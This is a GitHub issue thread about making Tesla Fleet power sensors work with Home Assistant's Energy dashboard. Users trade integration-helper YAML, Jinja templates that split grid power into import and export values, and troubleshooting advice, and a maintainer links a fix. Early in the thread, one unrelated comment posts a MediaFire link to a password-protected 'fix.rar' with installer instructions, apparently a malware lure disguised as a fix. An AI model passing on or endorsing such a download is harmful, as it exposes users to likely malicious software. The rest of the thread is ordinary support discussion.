Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Tesla Fleet Needs device_class type Energy #124671

Open
eddy-r opened this issue Aug 27, 2024 · 45 comments · May be fixed by #126878
Open

Tesla Fleet Needs device_class type Energy #124671

eddy-r opened this issue Aug 27, 2024 · 45 comments · May be fixed by #126878

Comments

@eddy-r
Copy link

eddy-r commented Aug 27, 2024

The problem

When configuring the Energy tab, adding a Grid Consumption sensor does not list any sensor from the Tesla Fleet sensors. Following the help link (https://www.home-assistant.io/docs/energy/faq/#troubleshooting-missing-entities) explains that power is measured in Watts and energy in kiloWatt-hour.

Tesla Fleet provides sensors for grid_power, load_power, solar_power, and battery_power with a unit of measure of kW and a device_class of power.

In order to use the information from these sensors in the Energy tab, the device_class needs to be energy. The state_class must be total or total_increasing. The unit_of_measure should be kWh.

These sensors cannot currently be used in the Energy tab as they are.

What version of Home Assistant Core has the issue?

core-2024.8.3

What was the last working version of Home Assistant Core?

No response

What type of installation are you running?

Home Assistant OS

Integration causing the issue

Tesla Fleet

Link to integration documentation on our website

https://www.home-assistant.io/integrations/tesla_fleet

Diagnostics information

No response

Example YAML snippet

No response

Anything in the logs that might be useful for us?

No response

Additional information

To reproduce, simply add a Tesla account with a solar system and attempt to add the consumption information.

@home-assistant
Copy link

Hey there @Bre77, mind taking a look at this issue as it has been labeled with an integration (tesla_fleet) you are listed as a code owner for? Thanks!

Code owner commands

Code owners of tesla_fleet can trigger bot actions by commenting:

  • @home-assistant close Closes the issue.
  • @home-assistant rename Awesome new title Renames the issue.
  • @home-assistant reopen Reopen the issue.
  • @home-assistant unassign tesla_fleet Removes the current integration label and assignees on the issue, add the integration domain after the command.
  • @home-assistant add-label needs-more-information Add a label (needs-more-information, problem in dependency, problem in custom component) to the issue.
  • @home-assistant remove-label needs-more-information Remove a label (needs-more-information, problem in dependency, problem in custom component) on the issue.

(message by CodeOwnersMention)


tesla_fleet documentation
tesla_fleet source
(message by IssueLinks)

@amir1387aht
Copy link

Download
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

@Bre77
Copy link
Contributor

Bre77 commented Aug 27, 2024

@eddy-r the information provided by Tesla is power, not energy. Changing the device_class will make it show up in the energy dashboard, but the information will be incorrect.

You need to create an integration helper to estimate the energy value from the power.
https://www.home-assistant.io/integrations/integration/#energy

@eddy-r
Copy link
Author

eddy-r commented Sep 6, 2024

@Bre77 exactly right, the information provided by Tesla is power, but a full integration for Home Assistant should provide the data points for useful features within Home Assistant. If this have been posted under feature request, please feel free to move it.

I have it working and showing data in the Energy tab, but it took some delving into the inner workings of the system. For instance, Tesla Fleet provides power as a single number, with a positive number meaning flow of power away from the given source (whether it's the grid, battery, or panels), and a negative value being power flowing towards the source of the reading. Taking this and producing a straight-forward integration helper that also shows positive and negative kWh is not what the Energy tab expects. First, I had to split the data from the grid and battery power into positive-only values.

For example, grid_power in the positive value became grid_import_kw. grid_power in the negative became a positive value for grid_export_kw. grid_import_kw and grid_export_kw then have to be used in the integration template to create grid_input_kwh and grid_export_kwh.

To extract the positive value from grid_power I wound up using {{ [ states('sensor.my_home_grid_power')|float(0), 0.0 ] | max }}, which because I am not fluent in the language used, I had to adapt from a search result. The method to convert a negative value into a positive value I wound up using was {{ [ ( -1 * states('sensor.my_home_grid_power')|float(0)), 0.0 ] | max }}.

Rinse and repeat for the battery, and create an integration helper for the solar panels, and it was done, but only after trial and error. After setting the Device section to the Tesla Fleet device name ("My Home" by default), all of these show up as entities and sensors for the device.

Isn't it possible to set this up programmatically so that users don't each have to go hunting for how to do those steps?

@Bre77
Copy link
Contributor

Bre77 commented Sep 6, 2024

Isn't it possible to set this up programmatically so that users don't each have to go hunting for how to do those steps?

It sure is, but as far as I am aware Home Assistant has rules against me doing it in the integration itself. I've asked the question on Discord because if I am allowed to then I defintely will for Tessie, Teslemetry, and Tesla Fleet.

@stromdriver
Copy link

stromdriver commented Sep 7, 2024

update: there was a communication issue with gateway seems to be functioning but the kwh data sensor isn't reporting any data even though the fleet sensor shows it

i thought i had this setup properly last night but because it was night i assumed thats why solar value was 0. i'm getting the energy from grid sensor just fine but still no solar readout, so it seems its properly portioned just not getting solar info? (complete newb to HA, just installed green box yesterday)

sensor:

  • platform: integration
    source: sensor.energy_site_solar_power # <-- the actual name of your sensor
    name: tesla_solar_panels_kWh
    unit_prefix: k
    unit_time: h
    round: 2

  • platform: integration
    source: sensor.energy_site_grid_power # <-- the actual name of your sensor
    name: APS_usage_kWh
    unit_prefix: k
    unit_time: h
    round: 2

@stromdriver
Copy link

Screenshot 2024-09-07 at 10-19-59 Settings – Home Assistant
Screenshot 2024-09-07 at 09-39-31 File editor – Home Assistant

@stromdriver
Copy link

@jeegnesh-patel
Copy link

Hey - so total novice first time user of HA which I primarily purchased for energy tracking to start with. I have the Tesla Fleet connected and obviously ran into the same problem as I was trying to setup the energy dashboard. I really tried my best to understand what was done in this thread but honestly getting nowhere. Would it be too much to ask for steps to create these sensors so I could use them in the energy dashboard? Thanks.

@Bre77
Copy link
Contributor

Bre77 commented Sep 12, 2024

Hey - so total novice first time user of HA which I primarily purchased for energy tracking to start with. I have the Tesla Fleet connected and obviously ran into the same problem as I was trying to setup the energy dashboard. I really tried my best to understand what was done in this thread but honestly getting nowhere. Would it be too much to ask for steps to create these sensors so I could use them in the energy dashboard? Thanks.

No that's a really good idea, I'll add a section to the documentation.

@jeegnesh-patel
Copy link

That would be so awesome and maybe stop me returning my HA green box

So for the silly, does that mean I will find it at the bottom of https://www.home-assistant.io/integrations/tesla_fleet once you add it? (Please write for the stupid)

@Bre77
Copy link
Contributor

Bre77 commented Sep 18, 2024

Documentation was updated with high level information, however we are working on adding actual history data for the energy dashboard now.

@jeegnesh-patel
Copy link

Thanks for that, I did see that but will need to take time as thats still above my current 0 education level.

Actual history data --> does that mean above steps not required or this is for something else?

@eddy-r
Copy link
Author

eddy-r commented Sep 19, 2024

While we wait on official documentation, I've put together my method to get the Energy Dashboard and Tesla Fleet talking to each other here. Please feel free to use this if it helps get instructions going.

@stromdriver
Copy link

While we wait on official documentation, I've put together my method to get the Energy Dashboard and Tesla Fleet talking to each other here. Please feel free to use this if it helps get instructions going.

cool thanks will try to dig into it tomorrow, it should be fine if we don't have a powerwall and just solar?

@eddy-r
Copy link
Author

eddy-r commented Sep 19, 2024 via email

@jeegnesh-patel
Copy link

While we wait on official documentation, I've put together my method to get the Energy Dashboard and Tesla Fleet talking to each other here. Please feel free to use this if it helps get instructions going.

@eddy-r this was exactly what I was looking for, I followed your steps, all the helpers are in, setup the energy board now just in the countdown for the hourly to see if I done it right, bit late here so I am hoping for a nice surprise in the morning.

Thank you so much for this.

@eddy-r
Copy link
Author

eddy-r commented Sep 24, 2024 via email

@jeegnesh-patel
Copy link

@eddy-r So getting figures and looking ok, just trying to get my head around understanding the numbers and checking them. The energy flow I assume is an accumulation rather than a live view?

my energy configuration is showing an error re negative figure, attaching image

IMG_8302

@stromdriver
Copy link

@gatsntatsdad, I tested and can confirm that after installing the sensors under Home Assistant version 2024.9.2 this error exists. I just updated to 2024.9.3 and the error does not happen again.

________________________________ From: gatsntatsdad @.> Sent: Tuesday, September 24, 2024 2:41:23 PM To: home-assistant/core @.> Cc: Eddy Redondo @.>; Mention @.> Subject: Re: [home-assistant/core] Tesla Fleet Needs device_class type Energy (Issue #124671) Screenshot.2024-09-24.at.11-37-27.Settings.Home.Assistant.png (view on web)https://github.com/user-attachments/assets/29c4758d-7951-48b1-b376-49b3c42ef087 — Reply to this email directly, view it on GitHub<#124671 (comment)>, or unsubscribehttps://github.com/notifications/unsubscribe-auth/ABPXJ26JWAMJ3B5VP6WT6MLZYGW5HAVCNFSM6AAAAABNFJUBESVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGNZSGAZTENRSG4. You are receiving this because you were mentioned.Message ID: @.***>

so there is still something wrong, my energy panel is showing no data (its been 3+ hours since setting it up) not sure if i set it up wrong or what but in the 'master' panel it shows data for the tesla entities but nothing is getting to the energy panel
Screenshot 2024-09-24 at 15-53-56 Settings – Home Assistant
Screenshot 2024-09-24 at 15-53-25 Settings – Home Assistant
Screenshot 2024-09-24 at 15-52-08 Overview – Home Assistant

@stromdriver
Copy link

Screenshot 2024-09-24 at 16-26-53 Settings – Home Assistant

@eddy-r
Copy link
Author

eddy-r commented Sep 25, 2024

@eddy-r So getting figures and looking ok, just trying to get my head around understanding the numbers and checking them. The energy flow I assume is an accumulation rather than a live view?

my energy configuration is showing an error re negative figure, attaching image

@jeegnesh-patel it looks to me like you may have copied something wrong during the process. I have updated my process with additional notes to help catch errors.

@eddy-r
Copy link
Author

eddy-r commented Sep 25, 2024

@gatsntatsdad, I tested and can confirm that after installing the sensors under Home Assistant version 2024.9.2 this error exists. I just updated to 2024.9.3 and the error does not happen again.

________________________________ From: gatsntatsdad @.> Sent: Tuesday, September 24, 2024 2:41:23 PM To: home-assistant/core _@**._> Cc: Eddy Redondo _@.>; Mention @._> Subject: Re: [home-assistant/core] Tesla Fleet Needs device_class type Energy (Issue #124671) Screenshot.2024-09-24.at.11-37-27.Settings.Home.Assistant.png (view on web)https://github.com/user-attachments/assets/29c4758d-7951-48b1-b376-49b3c42ef087 — Reply to this email directly, view it on GitHub<#124671 (comment)>, or unsubscribehttps://github.com/notifications/unsubscribe-auth/ABPXJ26JWAMJ3B5VP6WT6MLZYGW5HAVCNFSM6AAAAABNFJUBESVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGNZSGAZTENRSG4. You are receiving this because you were mentioned.Message ID: _@_.*>

so there is still something wrong, my energy panel is showing no data (its been 3+ hours since setting it up) not sure if i set it up wrong or what but in the 'master' panel it shows data for the tesla entities but nothing is getting to the energy panel

@stromdriver,

Looking at your list of sensors, you may have created an extra sensor that wasn't needed for the solar panels. Also, the grid export and grid import template sensors don't look like they are reading from your Grid power sensor.

I've edited my process with additional notes to help catch errors. You many need to delete these sensors and start over.

@stromdriver
Copy link

@gatsntatsdad, I tested and can confirm that after installing the sensors under Home Assistant version 2024.9.2 this error exists. I just updated to 2024.9.3 and the error does not happen again.

________________________________ From: gatsntatsdad @.> Sent: Tuesday, September 24, 2024 2:41:23 PM To: home-assistant/core _@**._> Cc: Eddy Redondo _@.>; Mention @._> Subject: Re: [home-assistant/core] Tesla Fleet Needs device_class type Energy (Issue #124671) Screenshot.2024-09-24.at.11-37-27.Settings.Home.Assistant.png (view on web)https://github.com/user-attachments/assets/29c4758d-7951-48b1-b376-49b3c42ef087 — Reply to this email directly, view it on GitHub<#124671 (comment)>, or unsubscribehttps://github.com/notifications/unsubscribe-auth/ABPXJ26JWAMJ3B5VP6WT6MLZYGW5HAVCNFSM6AAAAABNFJUBESVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGNZSGAZTENRSG4. You are receiving this because you were mentioned.Message ID: _@_.*>

so there is still something wrong, my energy panel is showing no data (its been 3+ hours since setting it up) not sure if i set it up wrong or what but in the 'master' panel it shows data for the tesla entities but nothing is getting to the energy panel

@stromdriver,

Looking at your list of sensors, you may have created an extra sensor that wasn't needed for the solar panels. Also, the grid export and grid import template sensors don't look like they are reading from your Grid power sensor.

I've edited my process with additional notes to help catch errors. You many need to delete these sensors and start over.

thanks, i think i figured it out, i'd removed the ' ' around the sensor entities because i mistakenly assumed the quotes weren't necessary and just denoted what needed to be replaced with my values (i'm completely new to css coding)
it's dark now so there's no solar data but if it's still not showing tomorrow i'll double check to try to see what it's doing

@jeegnesh-patel
Copy link

my process

Nice, went thru again - I think I found one issue, my internal sensor has measurement as kwh your doc states hours, this actually seems to be on all sensors, when I try to change it only power types appear, hours is not an option -- I am sure I set it up as hours on all, could you check when you edit yours what it says?

@stromdriver
Copy link

ok, i have no idea whats going on, but now my panels and sensors are all wacked out, attached is the tesla fleet panel information (i'd fixed the decimal place the other day and now it's even more messed up) and my tesla app screen showing it's information, also sometimes when i open the energy panel it shows wildly different data/trends, especially on different devices...

Screenshot 2024-09-26 at 17-21-10 Settings – Home Assistant
26861

@eddy-r
Copy link
Author

eddy-r commented Sep 27, 2024 via email

@stromdriver
Copy link

sorry about your shoulder man, speedy recovery

i get that there is latency and therefore a slight difference in values, but i'm not sure how reading hundreds of millions of kW is normal?
everything worked and displayed fine after fixing the ' ' issues 2 days ago that i'd messed up initially, but it's gone increasingly insane per the screen shots, the numbers are flying up in a blur

@eddy-r
Copy link
Author

eddy-r commented Sep 27, 2024 via email

@stromdriver
Copy link

Delete the two sensors and Rex add them if you think you might have had a bad prefix in there at any point. I remember doing something dumb like that and winding up with kkWh readings at some point. I didn’t wait to see what reading it gave. I do know it was easier to delete and recreate the sensor than to fix it. To delete a sensor, I go to Settings -> Devices & services -> Helpers. Select the sensor, click the settings gear, and select Delete at the bottom.

________________________________ From: gatsntatsdad @.> Sent: Thursday, September 26, 2024 11:27:34 PM To: home-assistant/core @.> Cc: Eddy Redondo @.>; Mention @.> Subject: Re: [home-assistant/core] Tesla Fleet Needs device_class type Energy (Issue #124671) sorry about your shoulder man, speedy recovery i get that there is latency and therefore a slight difference in values, but i'm not sure how reading hundreds of millions of kW is normal? everything worked and displayed fine after fixing the ' ' issues 2 days ago that i'd messed up initially, but it's gone increasingly insane per the screen shots, the numbers are flying up in a blur — Reply to this email directly, view it on GitHub<#124671 (comment)>, or unsubscribehttps://github.com/notifications/unsubscribe-auth/ABPXJ27W6VPBLTW2VB5GFL3ZYTGCNAVCNFSM6AAAAABNFJUBESVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGNZYGMZTEMRZHE. You are receiving this because you were mentioned.Message ID: @.***>

ok i'll give that a try tomorrow thanks

@Bre77 Bre77 linked a pull request Sep 27, 2024 that will close this issue
19 tasks
@stromdriver
Copy link

Delete the two sensors and Rex add them if you think you might have had a bad prefix in there at any point. I remember doing something dumb like that and winding up with kkWh readings at some point. I didn’t wait to see what reading it gave. I do know it was easier to delete and recreate the sensor than to fix it. To delete a sensor, I go to Settings -> Devices & services -> Helpers. Select the sensor, click the settings gear, and select Delete at the bottom.

________________________________ From: gatsntatsdad @.> Sent: Thursday, September 26, 2024 11:27:34 PM To: home-assistant/core @.> Cc: Eddy Redondo @.>; Mention @.> Subject: Re: [home-assistant/core] Tesla Fleet Needs device_class type Energy (Issue #124671) sorry about your shoulder man, speedy recovery i get that there is latency and therefore a slight difference in values, but i'm not sure how reading hundreds of millions of kW is normal? everything worked and displayed fine after fixing the ' ' issues 2 days ago that i'd messed up initially, but it's gone increasingly insane per the screen shots, the numbers are flying up in a blur — Reply to this email directly, view it on GitHub<#124671 (comment)>, or unsubscribehttps://github.com/notifications/unsubscribe-auth/ABPXJ27W6VPBLTW2VB5GFL3ZYTGCNAVCNFSM6AAAAABNFJUBESVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGNZYGMZTEMRZHE. You are receiving this because you were mentioned.Message ID: @.***>

ok i deleted the sensors (i did it thru the listing in tesla fleet device though....) and followed all the directions again to create, this is what i've got, not sure why templates and integral sensors is doubled up, they each contain the exact same entities...
i'll give it some time and see what happens

Screenshot 2024-09-27 at 16-27-38 Settings – Home Assistant

@jeegnesh-patel
Copy link

my process

Nice, went thru again - I think I found one issue, my internal sensor has measurement as kwh your doc states hours, this actually seems to be on all sensors, when I try to change it only power types appear, hours is not an option -- I am sure I set it up as hours on all, could you check when you edit yours what it says?

Any ideas on this one?

@eddy-r
Copy link
Author

eddy-r commented Sep 30, 2024 via email

@jeegnesh-patel
Copy link

Got you, so I deleted and recreated, unless you need to wait for the data to refresh/repull it all looks the same, so the issue is negative numbers for battery storage:-

Screenshot 2024-09-30 at 17 05 08

Here the custom sensors readings

Screenshot 2024-09-30 at 17 04 04

@stromdriver
Copy link

I'm going to try and understand what the question is, so please clarify if I don't answer your actual question. The only sensors that have hours listed as a unit of measure are the integral sensors' time unit. Once set, this value is not available for editing and not visible from any of the screens I have tried to access it. Once created, the unit of measurement becomes kWh, which is a combination of the sensor it is taking its readings from (measure of power in kW) and the unit of time selected. The correct unit of measure for an integral sensor is kWh. I cannot speak for what corrections can be made after creating the sensors, because I found it best to delete and recreate a sensor if I made a bad selection at some point during the creation process.

________________________________ From: jeegnesh-patel @.> Sent: Monday, September 30, 2024 10:18:51 AM To: home-assistant/core @.> Cc: Eddy Redondo @.>; Mention @.> Subject: Re: [home-assistant/core] Tesla Fleet Needs device_class type Energy (Issue #124671) my processhttps://docs.google.com/document/d/15yREpCgAmLnLrfSl11WUsUsDJvxq8RdonRP0JsWMAxQ/pub Nice, went thru again - I think I found one issue, my internal sensor has measurement as kwh your doc states hours, this actually seems to be on all sensors, when I try to change it only power types appear, hours is not an option -- I am sure I set it up as hours on all, could you check when you edit yours what it says? Any ideas on this one? — Reply to this email directly, view it on GitHub<#124671 (comment)>, or unsubscribehttps://github.com/notifications/unsubscribe-auth/ABPXJ267MIUNXFI3PJPB6GLZZFMUXAVCNFSM6AAAAABNFJUBESVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGOBTGM2DIOBTHE. You are receiving this because you were mentioned.Message ID: @.***>

so i'm still having 'unknown' and 0 values for grid export, i'd deleted everything and started over, other than this set of metrics everything appears to be working properly
Screenshot 2024-09-30 at 09-50-19 Settings – Home Assistant

@eddy-r
Copy link
Author

eddy-r commented Sep 30, 2024 via email

@stromdriver
Copy link

That's unusual. When you recreate those sensors, their new kWh should start at zero.

________________________________ From: jeegnesh-patel @.> Sent: Monday, September 30, 2024 12:07:25 PM To: home-assistant/core @.> Cc: Eddy Redondo @.>; Mention @.> Subject: Re: [home-assistant/core] Tesla Fleet Needs device_class type Energy (Issue #124671) Got you, so I deleted and recreated, unless you need to wait for the data to refresh/repull it all looks the same, so the issue is negative numbers for battery storage:- Screenshot.2024-09-30.at.17.05.08.png (view on web)https://github.com/user-attachments/assets/807b33d9-6e97-4d37-8b33-4916ee831390 Here the custom sensors readings Screenshot.2024-09-30.at.17.04.04.png (view on web)https://github.com/user-attachments/assets/9d568735-2de6-4137-8583-68fe9a27f752 — Reply to this email directly, view it on GitHub<#124671 (comment)>, or unsubscribehttps://github.com/notifications/unsubscribe-auth/ABPXJ22AQUJ3ZP75U6WYLGTZZFZL3AVCNFSM6AAAAABNFJUBESVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGOBTGYYTENBUHA. You are receiving this because you were mentioned.Message ID: @.***>

i'm still not getting grid export to work, here's shots of the setup, i thought i followed your site exactly, everything else is working properly now after ditching and redoing everything except this
Screenshot 2024-10-07 at 11-00-33 Settings – Home Assistant
Screenshot 2024-10-07 at 10-51-49 Settings – Home Assistant

@stromdriver
Copy link

@eddy-r

it's been a bit, can you look at my last post having this issue after using the last recommendation you made

@audiobruce
Copy link

Hi @Bre77,

Love your work on this. Do you have a guess on when Add Energy History to Tesla Fleet #126878 will be available in HA?

Hanging out for it!

cheers,
Bruce

@Bre77
Copy link
Contributor

Bre77 commented Nov 28, 2024

Hi @Bre77,

Love your work on this. Do you have a guess on when Add Energy History to Tesla Fleet #126878 will be available in HA?

Hanging out for it!

cheers,
Bruce

I'm waiting for someone to review and approve it. Unfortunately I don't really have much control over that.

YOU can review and approve it yourself which will help it get noticed by someone on the core team.

@stromdriver
Copy link

Hi @Bre77,
Love your work on this. Do you have a guess on when Add Energy History to Tesla Fleet #126878 will be available in HA?
Hanging out for it!
cheers,
Bruce

I'm waiting for someone to review and approve it. Unfortunately I don't really have much control over that.

YOU can review and approve it yourself which will help it get noticed by someone on the core team.

well crap i've been replying to the wrong username, can you look up at my replies to eddy about my issues i'm having with the integration?
thanks

@bodlang
Copy link

bodlang commented Nov 29, 2024

While we wait on official documentation, I've put together my method to get the Energy Dashboard and Tesla Fleet talking to each other here. Please feel free to use this if it helps get instructions going.

Thanks for this - saved my many hours of head scratching!

@Bre77
Copy link
Contributor

Bre77 commented Nov 29, 2024

can you look up at my replies to eddy about my issues i'm having with the integration?
thanks

@stromdriver If your having an issue you should raise your own issue on, this one is essentially a feature request which I've already completed.

@stromdriver
Copy link

can you look up at my replies to eddy about my issues i'm having with the integration?
thanks

@stromdriver If your having an issue you should raise your own issue on, this one is essentially a feature request which I've already completed.

oh ok sorry

@rjgguk
Copy link

rjgguk commented Jan 9, 2025

@eddy-r Thank you for much for the documentation!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging a pull request may close this issue.

8 participants